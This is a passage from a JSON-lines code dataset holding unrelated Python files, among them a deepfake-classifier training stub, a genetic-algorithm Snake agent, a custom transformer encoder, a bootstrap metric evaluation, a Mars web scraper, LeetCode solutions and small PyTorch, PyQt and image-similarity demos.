get_dali_dataset(video_paths, labels)\n dataset = dataset.batch(1)\n return dataset\n\n\nif __name__ == '__main__':\n xception = tf.keras.applications.xception.Xception(\n include_top=False, weights='imagenet',\n input_shape=(config.IMG_SIZE, config.IMG_SIZE, 3),\n pooling='max')\n xception_out = xception.get_layer('global_max_pooling2d').output\n\n out = tf.keras.layers.Dense(1, activation='sigmoid')(xception_out)\n model = tf.keras.models.Model(xception.input, out)\n model.compile(optimizer='adam', loss='binary_crossentropy')\n\n train_dataset = get_dataset()\n\n model.fit(\n x=train_dataset,\n epochs=config.EPOCHS\n )\n","repo_name":"sashulyak/kgl_deepfake","sub_path":"src/dali_train.py","file_name":"dali_train.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"28777570756","text":"import os\nimport random\n\nimport numpy as np\nimport torch\n\nfrom gameTrainer import Direction, GameTrainer\nfrom helper import plot\nfrom model import LinearQNet, DEVICE\n\nPOPULATION_SIZE = 100\nMUTATION_RATE = 0.5\nCROSSOVER_RATE = 0.2\nGENERATION_SIZE = 1000\n\n\nclass Agent:\n\n def __init__(self, model):\n self.model = model\n\n @staticmethod\n def get_state(game):\n state = [\n # Wall location\n game.collision(0, 'wall'),\n game.collision(1, 'wall'),\n game.collision(2, 'wall'),\n game.collision(3, 'wall'),\n game.collision(4, 'wall'),\n game.collision(5, 'wall'),\n game.collision(6, 'wall'),\n game.collision(7, 'wall'),\n\n # Snake location\n game.collision(2, 'snake'),\n game.collision(3, 'snake'),\n game.collision(0, 'snake'),\n game.collision(1, 'snake'),\n game.collision(6, 'snake'),\n game.collision(7, 'snake'),\n game.collision(4, 'snake'),\n game.collision(5, 'snake'),\n\n # Food location\n game.collision(2, 'food'),\n game.collision(3, 'food'),\n game.collision(0, 'food'),\n game.collision(1, 'food'),\n game.collision(6, 'food'),\n game.collision(7, 'food'),\n game.collision(4, 'food'),\n game.collision(5, 'food'),\n\n game.snake.direction == Direction.RIGHT,\n game.snake.direction == Direction.UP,\n game.snake.direction == Direction.LEFT,\n game.snake.direction == Direction.DOWN\n ]\n\n return np.array(state, dtype=float)\n\n def get_action(self, state):\n final_move = [0, 0, 0, 0]\n state0 = torch.tensor(state, dtype=torch.float, device=DEVICE)\n prediction = self.model(state0)\n move = torch.argmax(prediction).item()\n final_move[move] = 1\n\n return final_move\n\n\ndef evaluate(score, steps):\n return score + 0.5 + (0.5 * (score - steps / (score + 1)) / (score + steps / (score + 1)))\n\n\ndef snake_ai(model):\n game = GameTrainer()\n agent = Agent(model)\n while True:\n # get old state\n state_old = agent.get_state(game)\n\n # get move\n final_move = agent.get_action(state_old)\n\n # perform move and get new state\n reward, done, score, steps = game.step_by_pygame(final_move)\n\n if done:\n fitness = evaluate(score, steps)\n\n print('Score:', score, 'Steps:', steps, 'Fitness:', fitness)\n\n return fitness\n\n\ndef select_parents(population, fitness):\n population_size = int(len(population) * CROSSOVER_RATE)\n population_fitness = list(zip(population, fitness))\n population_fitness.sort(key=lambda x: x[1], reverse=True)\n population_fitness = [x for x in population_fitness if x[1] != 0]\n if population_fitness is None or len(population_fitness) < 2:\n return [LinearQNet(28, 8, 4) for _ in range(POPULATION_SIZE)]\n population, fitness = zip(*population_fitness)\n if len(population) > 
population_size:\n elite = list(population)[:population_size]\n else:\n elite = list(population)[:len(population)]\n return elite\n\n\ndef crossover(parent1, parent2):\n # Create a new model with the same architecture as parent1\n child = LinearQNet(28, 8, 4)\n child.load_state_dict(parent1.state_dict())\n # Select a crossover point\n crossover_point = random.randint(1, len(parent1.state_dict()))\n # Copy the parameters from parent2 to child\n for i, (name, param) in enumerate(parent2.state_dict().items()):\n if i >= crossover_point:\n child.state_dict()[name].copy_(param)\n return child\n\n\ndef mutation(child):\n for param in child.parameters():\n if random.random() < MUTATION_RATE:\n noise = torch.randn_like(param) * 0.1\n param.data += noise\n return child\n\n\ndef crossover_and_mutation(parents):\n children = parents.copy()\n for _ in range(POPULATION_SIZE - len(parents)):\n parent1 = parents[random.randint(0, len(parents) - 1)]\n parent2 = parents[random.randint(0, len(parents) - 1)]\n child_crossover = crossover(parent1, parent2)\n child_mutation = mutation(child_crossover)\n children.append(child_mutation)\n for idx in range(len(children)):\n children[idx].save(file_name=f'model{idx + 1}.pth')\n return children\n\n\ndef train():\n scores = []\n mean_scores = []\n generations = 0\n\n model_folder_path = './model'\n population = []\n if os.path.exists(model_folder_path):\n for i in os.listdir(model_folder_path):\n model = LinearQNet(28, 8, 4)\n model.load_state_dict(torch.load(os.path.join(model_folder_path, i)))\n population.append(model)\n else:\n population = [LinearQNet(28, 8, 4) for _ in range(POPULATION_SIZE)]\n\n while GENERATION_SIZE > generations:\n # Evaluate the fitness of each individual\n fitness = [snake_ai(model) for model in population]\n\n # Select the individuals for crossover\n parents = select_parents(population, fitness)\n\n # Crossover and mutation\n population = crossover_and_mutation(parents)\n\n fitness.sort(reverse=True)\n scores.append(np.floor(fitness[0]))\n mean_scores.append(sum(scores) / len(scores))\n\n plot(scores, mean_scores)\n print(f'Generation: {generations} Top_Score: {np.floor(fitness[0])}')\n generations += 1\n\n","repo_name":"0oWoodenDooro0/SnakeAI","sub_path":"agent.py","file_name":"agent.py","file_ext":"py","file_size_in_byte":5521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20402850253","text":"from .config import *\n\n\ndef lstm_layer(x, batch_size, name):\n with tf.name_scope(name) as scope:\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(lstm_hidden, reuse=False)\n init = lstm_cell.zero_state(batch_size, tf.float32)\n x, state = tf.nn.dynamic_rnn(lstm_cell, inputs=x, initial_state=init, scope=scope)\n return x\n\n\ndef seq2seq(x, batch_size):\n x = lstm_layer(x, batch_size, 'lstm1')\n x = lstm_layer(x, batch_size, 'lstm2')\n return x\n\n\n","repo_name":"codybai/mycode","sub_path":"tensorflow/2018_6_10/tensorflow_wanzheng/finalmodel/Attention.py","file_name":"Attention.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"23081391000","text":"import torch\nimport torch.nn as nn\nimport numpy as np\n\nloss = nn.CrossEntropyLoss()\n\nY = torch.tensor([2, 0, 1])\n# nsamples x nclasses = 1x3\nY_pred_good = torch.tensor([[0.1, 1.0, 2.1],[2.0, 1.0, 0.1],[0.1, 3.0, 0.1]])\nY_pred_bad = torch.tensor([[0.5, 2.0, 0.3],[0.1, 1.0, 2.1],[0.1, 3.0, 0.1]])\n\nl1 = loss(Y_pred_good,Y)\nl2 = 
loss(Y_pred_bad,Y)\nprint(l1.item(), l2.item())\n\n_, predictions1 = torch.max(Y_pred_good, 1)\n_, predictions2 = torch.max(Y_pred_bad, 1)\n\nprint(predictions1,predictions2)\n\n\n\n# # softmax: e^x/SUM_i e^(x_i)\n# def softmax(x):\n#     return np.exp(x)/np.sum(np.exp(x), axis=0)\n\n# x = np.array([2.0, 1.0, 0.1])\n# outputs = softmax(x)\n# print('softmax numpy:', outputs)\n\n# x = torch.tensor([2.0, 1.0, 0.1])\n# outputs = torch.softmax(x, dim=0)\n# print('tensor:', outputs)\n\n# def cross_entropy(actual, predicted):\n#     loss = -np.sum(actual * np.log(predicted))\n#     return loss\n\n# Y = np.array([1,0,0])\n\n# Y_pred_good = np.array([0.7, 0.2, 0.1])\n# Y_pred_bad = np.array([0.1, 0.3, 0.6])\n# l1 = cross_entropy(Y, Y_pred_bad)\n# l2 = cross_entropy(Y, Y_pred_good)\n\n# print(l1, l2)","repo_name":"aijphy/practice-spring-2022","sub_path":"pytorchTutorial/softmax_crossentropy.py","file_name":"softmax_crossentropy.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21619825230","text":"class Solution:\n    def majorityElement(self, nums: list[int]) -> list[int]:\n        minimum = len(nums) // 3\n        counts = {}; majority = []\n        for num in nums:\n            if num in majority:\n                continue\n\n            if num not in counts.keys():\n                counts[num] = 0\n            counts[num] += 1\n\n            if counts[num] > minimum:\n                majority.append(num)\n\n        return majority\n","repo_name":"MatejHosek/leetcode","sub_path":"solutions/229-Majority_Element_II.py","file_name":"229-Majority_Element_II.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"34866232429","text":"import time\nimport numpy\nimport pandas\nimport scipy.stats\nimport sklearn\nfrom sklearn import metrics\nimport os\nimport multiprocessing\n\nthis_py_file = os.path.dirname(os.path.realpath(__file__))\n\n\ndata = pandas.read_csv(this_py_file+'/evaluation/MFTE_Python_Eval_Results_filtered.csv', keep_default_na=False)\n\nprint(data)\n\nprint(data.dtypes)\n\ndata['TagGold'].value_counts()\n\nmin_n = 100\n#exclude_tags = ['NONE', 'UNCLEAR', 'none', 'unclear']\n\ndata['Count'] = data.groupby('TagGold')['TagGold'].transform(len)\nenough_data = data['Count'] >= min_n\n#valid_tag_gold = ~data['TagGold'].isin(exclude_tags)\n#valid_tag = ~data['Tag'].isin(exclude_tags)\n#data_filtered = data[enough_data & valid_tag_gold & valid_tag]\ndata_filtered = data[enough_data]\n\ndata_filtered['TagGold'].value_counts()\n\ntags_remaining = set.union(set(data_filtered['TagGold']), set(data_filtered['Tag']))\n\ndata_filtered['TagGold'] = pandas.Categorical(data_filtered['TagGold'], categories=tags_remaining)\ndata_filtered['Tag'] = pandas.Categorical(data_filtered['Tag'], categories=tags_remaining)\n\ntags = data_filtered['TagGold'].unique()\n\nprecision, recall, f1, n = metrics.precision_recall_fscore_support(\n    data['TagGold'],\n    data['Tag'],\n    labels=tags\n)\n\nresults = pandas.DataFrame({\n    'tag': tags,\n    'precision': precision,\n    'recall': recall,\n    'f1': f1,\n    'n': n\n})\n\nresults\n\nresults = results.melt(id_vars=['tag', 'n'], var_name='metric')\n# results['lower'] = numpy.nan\n# results['upper'] = numpy.nan\n# results['valid'] = False\n\nresults\n\nn_resamples = 1000\n\ndata_bootstrap = data[data['TagGold'].isin(tags) | data['Tag'].isin(tags)]\n\n\ndef get_bootstrap_done (row: dict) -> dict:\n    print(row['tag'], row['metric'], '... 
', end='')\n    start_time = time.time()\n    temp = dict()\n    if row['value'] == 1.0:\n        print('skipping')\n        temp['lower'] = numpy.nan\n        temp['upper'] = numpy.nan\n        temp['valid'] = False\n        temp['tag'] = row['tag']\n        temp['metric'] = row['metric']\n        temp['n'] = row['n']\n    else:\n        if row['metric'] == 'precision':\n            func = sklearn.metrics.precision_score\n        elif row['metric'] == 'recall':\n            func = sklearn.metrics.recall_score\n        else:\n            func = sklearn.metrics.f1_score\n        \n        def metric(y_true, y_pred):\n            return func(y_true, y_pred, labels=[row['tag']], average=None)[0]\n\n        boot = scipy.stats.bootstrap(\n            (data_bootstrap['TagGold'], data_bootstrap['Tag']),\n            metric,\n            vectorized=False,\n            paired=True,\n            n_resamples=n_resamples,\n            method='percentile',\n            random_state=0\n        )\n        print('done', int(time.time() - start_time), 's')\n\n        # keep these assignments inside the else branch: boot is undefined for skipped rows\n        temp['lower'] = boot.confidence_interval.low\n        temp['upper'] = boot.confidence_interval.high\n        temp['valid'] = True\n        temp['tag'] = row['tag']\n        temp['metric'] = row['metric']\n        temp['n'] = row['n']\n    return temp\n\nresult_dict = results.T.to_dict().values()\n\nif __name__ == \"__main__\":\n    cpu_count = int(multiprocessing.cpu_count() / 2) #run half cpus\n    with multiprocessing.Pool(cpu_count) as pool:\n        result1 = pool.map(get_bootstrap_done, result_dict)\n    result1 = pandas.DataFrame(result1)\n    result1.to_csv(this_py_file+'/evaluation/Temp_CIs.csv', index=False)\n    results = results.merge(result1, on=['tag', 'metric', 'n'], how='left')\n    results.to_csv(this_py_file+'/evaluation/MFTE_Python_Eval_CIs.csv', index=False)\n\n\n\n# for rownum, row in results.iterrows():\n    \n#     print(rownum, ':', row['tag'], row['metric'], '... ', end='')\n#     start_time = time.time()\n    \n#     if row['value'] == 1.0:\n#         print('skipping')\n#         continue\n    \n#     if row['metric'] == 'precision':\n#         func = sklearn.metrics.precision_score\n#     elif row['metric'] == 'recall':\n#         func = sklearn.metrics.recall_score\n#     else:\n#         func = sklearn.metrics.f1_score\n    \n#     def metric(y_true, y_pred):\n#         return func(y_true, y_pred, labels=[row['tag']], average=None)[0]\n\n#     boot = scipy.stats.bootstrap(\n#         (data_bootstrap['TagGold'], data_bootstrap['Tag']),\n#         metric,\n#         vectorized=False,\n#         paired=True,\n#         n_resamples=n_resamples,\n#         method='percentile',\n#         random_state=0\n#     )\n    \n#     print('done', int(time.time() - start_time), 's')\n    \n#     results.loc[rownum, 'lower'] = boot.confidence_interval.low\n#     results.loc[rownum, 'upper'] = boot.confidence_interval.high\n#     results.loc[rownum, 'valid'] = True\n    \n","repo_name":"mshakirDr/MFTE","sub_path":"bootstrap_eval.py","file_name":"bootstrap_eval.py","file_ext":"py","file_size_in_byte":4512,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"4575073243","text":"from typing import List\n\n\nclass Solution:\n    def evenOddBit(self, n: int) -> List[int]:\n        ans = [0, 0]\n        cur = 0\n        while n:\n            if (n & 1) == 1:\n                ans[cur] += 1\n            n >>= 1\n            cur = (cur + 1) % 2\n        return ans","repo_name":"ArslanTu/algorithm","sub_path":"leetcode/6319. 奇偶位数.py","file_name":"6319. 
奇偶位数.py","file_ext":"py","file_size_in_byte":272,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71002419124","text":"# Dependencies\nfrom bs4 import BeautifulSoup\nfrom splinter import Browser\nimport requests\nimport pandas as pd\n\ndef scrape(info,url):\n    dg = []\n    executable_path = {'executable_path': 'chromedriver.exe'}\n    browser = Browser('chrome', **executable_path, headless=False)\n    browser.visit(url)\n    html = browser.html\n    soup = BeautifulSoup(html, 'html.parser')\n    if info == \"News\":\n        news = soup.find_all('ul', class_='item_list')\n        for new in news:\n            dic = {}\n            dic['title'] = new.find('div', class_='content_title').text\n            dic['p'] = new.find('a').text\n            dg.append(dic)\n    elif info == \"Images\":\n        featured_mars_image = soup.find_all('div', class_='img')\n        for i in range(len(featured_mars_image)):\n            dic = {}\n            dic['img'] = featured_mars_image[i].img[\"src\"]\n            dg.append(dic)\n    elif info == 'Weather':\n        response = requests.get(url)\n        soup = BeautifulSoup(response.text, 'html.parser')\n        dic = {}\n        dic['wea']= soup.find('p', class_ = \"TweetTextSize TweetTextSize--normal js-tweet-text tweet-text\").text.strip()\n        dg.append(dic)\n    elif info == 'Facts':\n        mars_tables = pd.read_html(url)\n        mars_tables_df = mars_tables[0]\n        mars_tables_df.columns = ['Description', 'Value']\n        dg = mars_tables_df\n    elif info == 'Hemis':\n        hemisphere_list=['Cerberus','Schiaparelli','Syrtis','Valles']\n        for hemi in hemisphere_list:\n            dic = {}\n            browser.visit(url)\n            browser.click_link_by_partial_text(hemi)\n            html = browser.html\n            soup = BeautifulSoup(html,'html.parser')\n            dic['image'] = soup.find('a',target=\"_blank\")['href']\n            dic['title'] = soup.find('h2',class_=\"title\").text\n            dg.append(dic)\n    browser.quit()\n    return dg\n\n\n\n\n    \n\n\n\n","repo_name":"Ximepss2/web-scraping-challenge","sub_path":"FlaskMisiontoMars/scrape_mars.py","file_name":"scrape_mars.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"72891272882","text":"from attention import DisentangledSelfAttention\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport copy\n\n\nclass CustomTransformerEncoderLayer(nn.Module):\n    r\"\"\"TransformerEncoderLayer is made up of self-attn and feedforward network.\n    This standard encoder layer is based on the paper \"Attention Is All You Need\".\n    Ashish Vaswani, Noam Shazeer, Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez,\n    Lukasz Kaiser, and Illia Polosukhin. 2017. Attention is all you need. In Advances in\n    Neural Information Processing Systems, pages 6000-6010. 
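This layer swaps the standard multi-head self-attention for DisentangledSelfAttention and concatenates the attention output with its input, so the feedforward block operates on d_model * (nhead + 1) features.\n    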
Users may modify or implement\n    in a different way during application.\n\n    Args:\n        d_model: the number of expected features in the input (required).\n        nhead: the number of heads in the multiheadattention models (required).\n        dim_feedforward: the dimension of the feedforward network model (default=2048).\n        dropout: the dropout value (default=0.1).\n        activation: the activation function of intermediate layer, relu or gelu (default=relu).\n\n    Examples::\n        >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n        >>> src = torch.rand(10, 32, 512)\n        >>> out = encoder_layer(src)\n    \"\"\"\n\n    def __init__(self, d_model, nhead, dim_feedforward=2048, dropout=0.1, activation=\"relu\"):\n        super(CustomTransformerEncoderLayer, self).__init__()\n        self.self_attn = DisentangledSelfAttention(d_model, nhead, dropout=dropout)\n        # Implementation of Feedforward model\n        self.linear1 = nn.Linear(d_model * (nhead + 1), dim_feedforward)\n        self.dropout = nn.Dropout(dropout)\n        self.linear2 = nn.Linear(dim_feedforward, d_model)\n\n        self.norm1 = nn.LayerNorm(d_model * (nhead + 1))\n        self.norm2 = nn.LayerNorm(d_model)\n        self.dropout1 = nn.Dropout(dropout)\n        self.dropout2 = nn.Dropout(dropout)\n\n        # honour the activation argument documented above (relu or gelu)\n        self.activation = F.relu if activation == \"relu\" else F.gelu\n\n    def forward(self, src, pos_encoding, rel_pos):\n        r\"\"\"Pass the input through the encoder layer.\n\n        Args:\n            src: the sequence to the encoder layer (required).\n\n\n        Shape:\n            see the docs in Transformer class.\n        \"\"\"\n        src2 = self.self_attn(src, pos_encoding, rel_pos)\n        # FIXME: Maybe sum instead of cat?\n        src = torch.cat((src, self.dropout1(src2)), -1)\n\n        src = self.norm1(src)\n        src2 = self.linear2(self.dropout(self.activation(self.linear1(src))))\n        # FIXME: Add back skip connection\n        #src = src + self.dropout2(src2)\n        src = self.dropout2(src2)\n        src = self.norm2(src)\n        return src\n\n\ndef _get_clones(module, N):\n    return nn.ModuleList([copy.deepcopy(module) for i in range(N)])\n\n\nclass CustomTransformerEncoder(nn.Module):\n    r\"\"\"TransformerEncoder is a stack of N encoder layers\n\n    Args:\n        encoder_layer: an instance of the TransformerEncoderLayer() class (required).\n        num_layers: the number of sub-encoder-layers in the encoder (required).\n        norm: the layer normalization component (optional).\n\n    Examples::\n        >>> encoder_layer = nn.TransformerEncoderLayer(d_model=512, nhead=8)\n        >>> transformer_encoder = nn.TransformerEncoder(encoder_layer, num_layers=6)\n        >>> src = torch.rand(10, 32, 512)\n        >>> out = transformer_encoder(src)\n    \"\"\"\n    __constants__ = ['norm']\n\n    def __init__(self, encoder_layer, num_layers, norm=None):\n        super(CustomTransformerEncoder, self).__init__()\n        self.layers = _get_clones(encoder_layer, num_layers)\n        self.num_layers = num_layers\n        self.norm = norm\n\n    def forward(self, src, pos_encoding, rel_pos):\n        r\"\"\"Pass the input through the encoder layers in turn.\n\n        Args:\n            src: the sequence to the encoder (required).\n            mask: the mask for the src sequence (optional).\n            src_key_padding_mask: the mask for the src keys per batch (optional).\n\n        Shape:\n            see the docs in Transformer class.\n        \"\"\"\n        output = src\n\n        for mod in self.layers:\n            output = mod(output, pos_encoding, rel_pos)\n\n        if self.norm is not None:\n            output = self.norm(output)\n\n        return output\n\n\nclass CustomTransformer(nn.Module):\n    r\"\"\"A transformer model. User is able to modify the attributes as needed. The architecture\n    is based on the paper \"Attention Is All You Need\". 
Ashish Vaswani, Noam Shazeer,\n Niki Parmar, Jakob Uszkoreit, Llion Jones, Aidan N Gomez, Lukasz Kaiser, and\n Illia Polosukhin. 2017. Attention is all you need. In Advances in Neural Information\n Processing Systems, pages 6000-6010. Users can build the BERT(https://arxiv.org/abs/1810.04805)\n model with corresponding parameters.\n\n Args:\n d_model: the number of expected features in the encoder/decoder inputs (default=512).\n nhead: the number of heads in the multiheadattention models (default=8).\n num_encoder_layers: the number of sub-encoder-layers in the encoder (default=6).\n num_decoder_layers: the number of sub-decoder-layers in the decoder (default=6).\n dim_feedforward: the dimension of the feedforward network model (default=2048).\n dropout: the dropout value (default=0.1).\n activation: the activation function of encoder/decoder intermediate layer, relu or gelu (default=relu).\n custom_encoder: custom encoder (default=None).\n custom_decoder: custom decoder (default=None).\n\n Examples::\n >>> transformer_model = nn.Transformer(nhead=16, num_encoder_layers=12)\n >>> src = torch.rand((10, 32, 512))\n >>> tgt = torch.rand((20, 32, 512))\n >>> out = transformer_model(src, tgt)\n\n Note: A full example to apply nn.Transformer module for the word language model is available in\n https://github.com/pytorch/examples/tree/master/word_language_model\n \"\"\"\n\n def __init__(self, d_model: int = 512, nhead: int = 8, num_encoder_layers: int = 6,\n dim_feedforward: int = 2048, dropout: float = 0.1,\n activation: str = \"relu\") -> None:\n super(CustomTransformer, self).__init__()\n\n encoder_layer = CustomTransformerEncoderLayer(d_model, nhead, dim_feedforward, dropout, activation)\n encoder_norm = nn.LayerNorm(d_model)\n self.encoder = CustomTransformerEncoder(encoder_layer, num_encoder_layers, encoder_norm)\n\n self._reset_parameters()\n\n self.d_model = d_model\n self.nhead = nhead\n\n def forward(self, src, pos_encoding, rel_pos):\n r\"\"\"Take in and process masked source/target sequences.\n\n Args:\n src: the sequence to the encoder (required).\n tgt: the sequence to the decoder (required).\n src_mask: the additive mask for the src sequence (optional).\n tgt_mask: the additive mask for the tgt sequence (optional).\n memory_mask: the additive mask for the encoder output (optional).\n src_key_padding_mask: the ByteTensor mask for src keys per batch (optional).\n tgt_key_padding_mask: the ByteTensor mask for tgt keys per batch (optional).\n memory_key_padding_mask: the ByteTensor mask for memory keys per batch (optional).\n\n Shape:\n - src: :math:`(S, N, E)`.\n - tgt: :math:`(T, N, E)`.\n - src_mask: :math:`(S, S)`.\n - tgt_mask: :math:`(T, T)`.\n - memory_mask: :math:`(T, S)`.\n - src_key_padding_mask: :math:`(N, S)`.\n - tgt_key_padding_mask: :math:`(N, T)`.\n - memory_key_padding_mask: :math:`(N, S)`.\n\n Note: [src/tgt/memory]_mask ensures that position i is allowed to attend the unmasked\n positions. If a ByteTensor is provided, the non-zero positions are not allowed to attend\n while the zero positions will be unchanged. If a BoolTensor is provided, positions with ``True``\n are not allowed to attend while ``False`` values will be unchanged. If a FloatTensor\n is provided, it will be added to the attention weight.\n [src/tgt/memory]_key_padding_mask provides specified elements in the key to be ignored by\n the attention. If a ByteTensor is provided, the non-zero positions will be ignored while the zero\n positions will be unchanged. 
If a BoolTensor is provided, the positions with the\n        value of ``True`` will be ignored while the position with the value of ``False`` will be unchanged.\n\n        - output: :math:`(T, N, E)`.\n\n        Note: Due to the multi-head attention architecture in the transformer model,\n        the output sequence length of a transformer is the same as the input sequence\n        (i.e. target) length of the decoder.\n\n        where S is the source sequence length, T is the target sequence length, N is the\n        batch size, E is the feature number\n\n        Examples:\n            >>> output = transformer_model(src, tgt, src_mask=src_mask, tgt_mask=tgt_mask)\n        \"\"\"\n\n        output = self.encoder(src, pos_encoding, rel_pos)\n        return output\n\n    def generate_square_subsequent_mask(self, sz: int) -> torch.Tensor:\n        r\"\"\"Generate a square mask for the sequence. The masked positions are filled with float('-inf').\n            Unmasked positions are filled with float(0.0).\n        \"\"\"\n        mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)\n        mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))\n        return mask\n\n    def _reset_parameters(self):\n        r\"\"\"Initiate parameters in the transformer model.\"\"\"\n\n        for p in self.parameters():\n            if p.dim() > 1:\n                torch.nn.init.xavier_uniform_(p)","repo_name":"bmanga/disentangled_attention","sub_path":"transformer.py","file_name":"transformer.py","file_ext":"py","file_size_in_byte":9734,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"30244505918","text":"class Node:\n    def __init__(self, value):\n        self.right = None\n        self.left = None\n        self.val = value\n\n\n\ndef inorder_traversal(tree):\n    current = tree\n    values = []\n    stack = []\n\n    while True:\n        if current:\n            stack.append(current)\n            current = current.left\n        \n        else:\n            if len(stack) > 0:\n                _v = stack.pop()\n                values.append(_v.val)\n                current = _v.right\n            else:\n                return values\n    \n    return values\n    \n\nroot = Node(1)\nroot.left = Node(2)\nroot.left.left = Node(4)\nroot.left.right = Node(5)\nroot.right = Node(3)\nroot.right.left = Node(6)\nroot.right.right = Node(7)\n\n# x = inorder_traversal(root)\n# print(x)","repo_name":"farhan0581/gfgcodes","sub_path":"trees/inorder_wr.py","file_name":"inorder_wr.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"5014269548","text":"# 0. imports\nfrom PyQt5.Qt import *\nimport sys\n# 1. create the application object\napp = QApplication(sys.argv)\n\n# 2.1 create the widget\nwindow = QWidget()\n# 2.2 configure the widget\nwindow.setWindowTitle(\"图标操作\")\nwindow.resize(500, 500)\n\nbtn = QPushButton(window)\nico = QIcon(r\"D:\\Desktop\\xxx.png\")\n# set the icon\nbtn.setIcon(ico)\nqsize = QSize(50, 50)\nbtn.setIconSize(qsize)\nprint(btn.icon())\nprint(btn.iconSize())\n\n\n\n# 2.3 show the widget\nwindow.show()\n# 3. run the application: enter the message loop so the program does not exit (infinite loop)\nsys.exit(app.exec_())","repo_name":"02605/PyQt5","sub_path":"35-QAbsBtu-图标操作.py","file_name":"35-QAbsBtu-图标操作.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11125494938","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys, os, glob\nimport matplotlib.tri as tri\nimport numpy.ma as ma\nfrom ROOT import TFile, TTree\n\ndeg = np.pi / 180.0\n\npath = \"./results/dz\"\nif len(sys.argv) > 1:\n    path = sys.argv[1]\nfiles = glob.glob(path + \"/*.root\")\nfiles.sort()\n\ndzs = np.zeros(len(files))\neff = 
np.zeros(len(files))\neff_sipm = np.zeros(len(files))\n\ndef get(filename):\n    # Open root file and retrieve tree\n    file = TFile(filename)\n    n = 0\n    try:\n        n = file.Get(\"wicoBackHits\").GetEntriesFast()\n    except:\n        pass\n    n_sipm = 0\n    for i in range(64):\n        try:\n            hits = file.Get(\"g4sipmHits-%d\" % i)\n            if hits != None:\n                n_sipm += hits.GetEntriesFast()\n        except:\n            pass\n    # Determine nTot\n    gps = file.Get(\"generalParticleSourceMessenger\")\n    gps.GetEntry(0)\n    nParticles = gps.nParticles\n    # Determine dz.\n    model = file.Get(\"famousModel\")\n    model.GetEntry(0)\n    dz = model.dz\n    #\n    file.Close()\n    return n, n_sipm, nParticles, dz\n\nfor i, file in enumerate(files):\n    n_hit, n_sipm, n_tot, dz = get(file)\n    dzs[i] = dz\n    eff[i] = n_hit / float(n_tot)\n    eff_sipm[i] = n_sipm / float(n_tot)\n \nidx = np.argsort(dzs)\ndzs = dzs[idx]  # sort the dz values together with the efficiencies so the plot is ordered\neff = eff[idx]\neff_sipm = eff_sipm[idx]\n \nplt.plot(dzs, eff * 100.0, label=\"Winston cone exit, optimum dz = %.3f mm\" % dzs[np.argmax(eff)])\nplt.plot(dzs, eff_sipm * 100.0, label=\"SiPM, optimum dz = %.3f mm\" % dzs[np.argmax(eff_sipm)])\nplt.xlabel(\"dz / mm\")\nplt.ylabel(\"efficiency / %\")\nplt.legend(loc=\"upper right\")\nplt.show()","repo_name":"ntim/famous","sub_path":"sim/plots/dz.py","file_name":"dz.py","file_ext":"py","file_size_in_byte":1623,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27632916582","text":"import random\n\ndef random_set(length, min=1, max=10000000):\n    result = set()\n    while len(result) < length:\n        while True:\n            n = random.randint(min, max)\n            if n not in result:\n                result.add(n)\n                break\n    return result\n\ndef random_list(length, min=1, max=100000000):\n    result = []\n    while len(result) < length:\n        n = random.randint(min, max)\n        result.append(n)\n    return result","repo_name":"chaosannals/trial-python","sub_path":"olddemo/trial/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"11821855161","text":"import cv2\nimport numpy as np\nfrom numpy import average, dot\nfrom scipy import linalg\nfrom skimage.metrics import structural_similarity as compare_ssim\n\ndef hist_similar(lh, rh):\n    assert len(lh) == len(rh)\n    hist = sum(1 - (0 if l == r else float(abs(l - r)) / max(l, r)) for l, r in zip(lh, rh)) / len(lh)\n    return hist\n\ndef calc_similar(imgA, imgB):\n    calc_sim = hist_similar(\n        cv2.calcHist(imgA, [3], None, [256], [0, 256]),\n        cv2.calcHist(imgB, [3], None, [256], [0, 256])\n    )\n    return calc_sim\n\ndef image_similarity_vectors_via_numpy(image1, image2):\n    # images = [cv2.cvtColor(image1, cv2.COLOR_RGB2GRAY), cv2.cvtColor(image2, cv2.COLOR_RGB2GRAY)]\n    images = [image1, image2]\n    vectors = []\n    norms = []\n    for image in images:\n        vector = []\n        for pixel_tuple in image:\n            vector.append(average(pixel_tuple))\n        vectors.append(np.array(vector))\n        # linalg = linear + algebra; norm computes the vector norm\n        # compute the norm of the image vector\n        norms.append(linalg.norm(vector, 2))\n    a, b = vectors\n    a_norm, b_norm = norms\n    # dot returns the dot product (matrix multiplication for 2-D arrays)\n    res = dot(a / a_norm, b / b_norm)\n    return 